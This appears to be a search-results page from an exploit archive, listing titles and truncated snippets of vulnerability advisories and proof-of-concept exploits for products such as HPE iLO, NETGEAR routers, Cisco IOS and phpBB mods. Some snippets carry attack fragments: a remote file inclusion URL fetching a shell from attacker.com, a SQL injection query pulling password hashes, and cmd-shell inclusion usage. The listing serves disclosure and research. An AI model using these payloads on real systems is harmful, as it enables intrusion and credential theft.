41207 matches found
HPE iLO 4 2.53 - Add New Administrator User
HPE iLO 4 2.53 - Add New Administrator User !/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP:...
NETGEAR Routers - Password Disclosure
NETGEAR Routers - Password Disclosure Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR http://www.netgear.com/ Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simo...
eGroupWare 1.8.006 - Multiple Vulnerabilities
eGroupWare 1.8.006 - Multiple Vulnerabilities Advisory ID: HTB23212 Product: EGroupware Vendor: http://www.egroupware.org/ Vulnerable Versions: 1.8.006 community edition and probably prior Tested Version: 1.8.006 community edition Advisory Publication: April 23, 2014 without technical details...
Linux Kernel - group_info refcounter Overflow Memory Corruption
Linux Kernel - groupinfo refcounter Overflow Memory Corruption / DoS poc for CVE-2014-2851 Linux groupinfo refcounter overflow memory corruption https://lkml.org/lkml/2014/4/10/736 @Tohmaxx - http://thomaspollet.blogspot.be If the app doesn't crash your system, try a different count argv1 Executi...
Tableau Server 8.0.7 8.1.2 - Blind SQL Injection
Tableau Server 8.0.7 8.1.2 - Blind SQL Injection Trustwave's SpiderLabs Security Advisory TWSL2014-003: Blind SQL Injection Vulnerability in Tableau Server Published: 02/07/14 Version: 1.1 Vendor: Tableau Software http://www.tableausoftware.com Product: Tableau Server Versions affected: 8.1.X...
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities
ZenPhoto 1.4.3.3 - Multiple Vulnerabilities waraxe-2012-SA096 - Multiple Vulnerabilities in Zenphoto 1.4.3.3 Author: Janek Vind "waraxe" Date: 03. November 2012 Location: Estonia, Tartu Web:...
Sunbird 0.9 - Array Overrun Code Execution
Sunbird 0.9 - Array Overrun Code Execution full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253 Sunbird 0.9 Array Overrun code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk:...
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...
EsFaq 2.0 - idcat SQL Injection
EsFaq 2.0 - idcat SQL Injection EsFaq Remote Sql Injection Exploit Author: SuB-ZeRo Home: www.dz-security.com email: [email protected] script: http://editeurscripts.com/ressources/scripts-php/dl.php?idscript...
MVC-Web CMS 1.01.2 - newsid SQL Injection
MVC-Web CMS 1.01.2 - newsid SQL Injection Bl@ckbe@rD 'Tunisian TerrorisT' Script Name: MVC-Web CMS 1.0 and 1.2 Remote SQL Injection Exploit Team: InjEct0r5 Author: Bl@ckbe@rD 'Tunisian TerrorisT' ...
Linux Kernel 2.0.x2.2.x2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x2.2.x2.4.x FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are small...
Categories hierarchy phpBB Mod 2.1.2 - phpbb_root_path Remote File Inclusion
Categories hierarchy phpBB Mod 2.1.2 - phpbbrootpath Remote File Inclusion C xoron Name: Categories hierarchy v2.1.2 phpbbrootpath Remote File Include Exploit Script name: Ptifo mod-CH212installed Author: xoron Exploit coded by xoron Download:...
Cyberfolio 2.0 RC1 - av Remote File Inclusion
Cyberfolio 2.0 RC1 - av Remote File Inclusion .OR.ID ECHOADV58$2006 ECHOADV58$2006 Cyberfolio =2.0 RC1 $av Remote File Inclusion...
EZContents 2.0.3 - showlinks.php?GLOBALS[admin_home] Remote File Inclusion
EZContents 2.0.3 - showlinks.php?GLOBALSadminhome Remote File Inclusion source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these...
Invision Power Board 2.1 2.1.6 - SQL Injection (2)
Invision Power Board 2.1 2.1.6 - SQL Injection 2 !/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent-new; &header; if @ARGV ".$server."result.txt"; for$id = 1; $id = $kol; $id++ $ownquery = "UNION SELECT convergepasshash,1,1,1 FROM ".$prefix."membersconverge WHERE convergeid=".$id."/";...
PHP121 Instant Messenger 1.4 - Remote Code Execution
PHP121 Instant Messenger 1.4 - Remote Code Execution !/usr/bin/php -q -d shortopentag=on works with magicquotesgpc = Off\r\n\r\n"; echo "a dork: inurl:php121login.php | inurl:php121im.php | intitle:"PHP121 - PLEASE"\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host path cmd OPTIONS\r\n"; echo...
Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service
Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service source: https://www.securityfocus.com/bid/13124/info Multiple vendor implementations of TCP/IP Internet Control Message Protocol ICMP are reported prone to several denial-of-service attacks. ICMP is employed by...
Microsoft Windows (x86) - Metafile .emf Heap Overflow (MS04-032)
Microsoft Windows x86 - Metafile .emf Heap Overflow MS04-032 / HOD-ms04032-emf-expl2.c: MS04-032 Microsoft Windows XP Metafile .emf Heap Overflow Exploit version 0.2 PUBLIC coded by .:: houseofdabus ::. at inbox dot ru About...
Alfresco 5.2.4 - Persistent Cross-Site Scripting
Alfresco 5.2.4 - Persistent Cross-Site Scripting Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting Date: 2020-03-02 Exploit Author: Romain LOISEL & Alexandre ZANNI https://pwn.by/noraj - Pentesters from Orange Cyberdefense France Vendor Homepage: https://www.alfresco.com/ Software...
BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
BOOTP Turbo 2.0 - Denial of Service SEHPoC Exploit Title: BOOTP Turbo 2.0 - Denial of Service SEHPoC Exploit Author: boku Date: 2020-01-22 Software Vendor: Wierd Solutions Vendor Homepage: https://www.weird-solutions.com Software Link:...
GTalk Password Finder 2.2.1 - Key Denial of Service (PoC)
GTalk Password Finder 2.2.1 - Key Denial of Service PoC Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service PoC Exploit Author: Ismail Tasdelen Exploit Date: 2020-01-16 Vendor Homepage : http://www.nsauditor.com/ Link Software :...
TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)
TemaTres 3.0 - Cross-Site Request Forgery Add Admin Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery Add Admin Author: Pablo Santiago Date: 2019-11-14 Vendor Homepage: https://www.vocabularyserver.com/ Source:...
LibreOffice 6.2.6 Macro - Python Code Execution (Metasploit)
LibreOffice 6.2.6 Macro - Python Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreOffice Macro Python Code Execution', 'Description' = %q LibreOffice comes bundled...
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR / A bug in IonMonkeys type inference system when JIT compiling and entering a constructor function via on-stack replacement OSR allows the compilation of JITed functions that cause type confusions between...
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation Date: 2019-01-22 Exploit Author: Chris Lyne @lynerc Vendor Homepage: https://www.nagios.com/ Product: Nagios XI Software Link:...
Nagios Core 4.4.1 - Denial of Service
Nagios Core 4.4.1 - Denial of Service Exploit Title: Nagios Core Multiple Local Denial of Service Date: 2018-07-09 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.nagios.org/ Software Link: https://www.nagios.org/downloads/nagios-core/ Version: 4.4.1 and earlier Tested on:...
MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting
MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting Date: 5/25/2018 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=1125 Version: 1.0.2...
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure -- coding: utf-8 -- Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump Vendor Notification: 03-03-2018 - No response Initial CVE: 04-04-2018 Disclosure: 21-04-2018 Exploit Author: Berk Cem Göksel Contact: twitter.com/berkcgoks...
Asterisk chan_pjsip 15.2.0 - SUBSCRIBE Stack Corruption
Asterisk chanpjsip 15.2.0 - SUBSCRIBE Stack Corruption ''' SUBSCRIBE message with a large Accept value causes stack corruption - Authors: - Alfred Farrugia - Sandro Gauci - Latest vulnerable version: Asterisk 15.2.0 running chanpjsip - Tested vulnerable versions: 15.2.0, 13.19.0, 14.7.5, 13.11.2 ...
System Shield 5.0.0.136 - Privilege Escalation
System Shield 5.0.0.136 - Privilege Escalation / Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 ...
Cisco IOS - Remote Code Execution
Cisco IOS - Remote Code Execution !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco...
Check_MK 1.2.8p25 - Information Disclosure
CheckMK 1.2.8p25 - Information Disclosure 1. ADVISORY INFORMATION Product: Checkmk Vendor URL: https://mathias-kettner.de/checkmk.html Type: Race Condition CWE-362 Date found: 2017-09-21 Date published: 2017-10-18 CVSSv3 Score: 7.5...
Microsoft Windows - USP10!otlSinglePosLookup::getCoverageTable Uniscribe Font Processing Out-of-Bounds Memory Read
Microsoft Windows - USP10!otlSinglePosLookup::getCoverageTable Uniscribe Font Processing Out-of-Bounds Memory Read Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1203 We have encountered a crash in the Windows Uniscribe user-mode library, in the...
Axis Network Cameras - Multiple Vulnerabilities
Axis Network Cameras - Multiple Vulnerabilities 6079 Smith W doubleplusungood owning some telescreens... Security Advisory 2016-04-09 www.orwelllabs.com twt:@orwelllabs I. ADVISORY...
Google Android - Stagefright Remote Code Execution
Google Android - Stagefright Remote Code Execution !/usr/bin/env python Joshua J. Drake @jduck of ZIMPERIUM zLabs Shout outs to our friends at Optiv formerly Accuvant Labs C Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 www.zimperium.com Exploit for RCE Vulnerability CVE-2015-153...
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service !/usr/bin/perl miniupnpd/1.0 remote denial of service exploit Copyright 2015 c Todor Donev [email protected] http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg The SSDP protocol can discover Plug & Play devices, with...
MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities
MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities Trustwave SpiderLabs Security Advisory TWSL2013-019: Multiple Vulnerabilities in MiCasaVerde VeraLite Published: 08/01/13 Version: 1.0 Vendor: MiCasaVerde http://www.micasaverde.com/ Product: VeraLite Version affected: 1.5.408 Product...
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)
Microsoft DirectShow - Arbitrary Memory Overwrite MS13-056 Introduction: The Microsoft DirectShow application programming interface API is a media-streaming architecture for Microsoft Windows. Using DirectShow, your applications can perform high-quality video and audio playback or capture...
GIMP 2.8.0 - .FIT File Format Denial of Service
GIMP 2.8.0 - .FIT File Format Denial of Service Summary: There is a file handling DoS in GIMP the GNU Image Manipulation Program for the 'fit' file format affecting all versions Windows and Linux up to and including 2.8.0. A file in the fit format with a malformed 'XTENSION' header will...
GNU libcregcomp(3) - Multiple Vulnerabilities
GNU libcregcomp3 - Multiple Vulnerabilities // source: http://securityreason.com/securityalert/8003 GNU libc/regcomp3 Multiple Vulnerabilities Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - Dis.: 01.10.2010 -...
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite // source: https://www.securityfocus.com/bid/44242/info / CVE-2010-2963 Arbitrary write memory write via v4l1 compat ioctl. Kees Cook greets to drosenberg, spender, taviso / define GNUSOURCE include include include include includ...
bwired - index.php?newsID SQL Injection
bwired - index.php?newsID SQL Injection Program Title: bwired - Remote SQL Injection Note: There is also XSS, PHPSESSID session fixation, and cookie manipulation which I...
INDEXU 5.0.1 - base_path Remote File Inclusion
INDEXU 5.0.1 - basepath Remote File Inclusion !/usr/bin/perl INDEXU perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...
AOL Instant Messenger AIM - Away Message Local Overflow
AOL Instant Messenger AIM - Away Message Local Overflow / subject: local PoC exploit for AIM 5.5.3595 vendor: http://www.aim.com cve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636 credits: Matt Murphy date: 10 August 2004 notes: exploits localy if an argument is supplied,...
Microsoft IIS 5.0 - WebDAV Remote
Microsoft IIS 5.0 - WebDAV Remote IIS 5.0 WebDAV -Proof of concept- Bug: CAN-2003-0109 By Roman Medina-Heigl Hernandez aka RoMaNSoFt Madrid, 23.Mar.2003 Public release. Version 1. ...
DCP-Portal 5.0.1 - lib.php?Root Remote File Inclusion
DCP-Portal 5.0.1 - lib.php?Root Remote File Inclusion source: https://www.securityfocus.com/bid/6525/info DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. An attacker may exploit this by supplying a path to a maliciously create...
EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution Date: 2020-02-01 Exploit Author: Clément Billac Vendor Homepage: https://www.eyesofnetwork.com/ Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x8664-bin.iso Version: 5.3 CVE :...
AnchorCMS 0.12.3a - Information Disclosure
AnchorCMS 0.12.3a - Information Disclosure Exploit Title: Information disclosure MySQL password in error log Date: 2/10/2019 Exploit Author: Tijme Gommers https://twitter.com/finnwea/ Vendor Homepage: https://anchorcms.com/ Software Link: https://github.com/anchorcms/anchor-cms/releases Version:...
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 20...
DotNetNuke DNNarticle Module 11 - Directory Traversal
DotNetNuke DNNarticle Module 11 - Directory Traversal 01. Advisory Information Title: Directory Traversal Vulnerability in DNNarticle module Date published: n/a Date of last update: n/a Vendors contacted: zldnn.com Discovered by: Esmaeil Rahimian Severity: Critical 02. Vulnerability Information...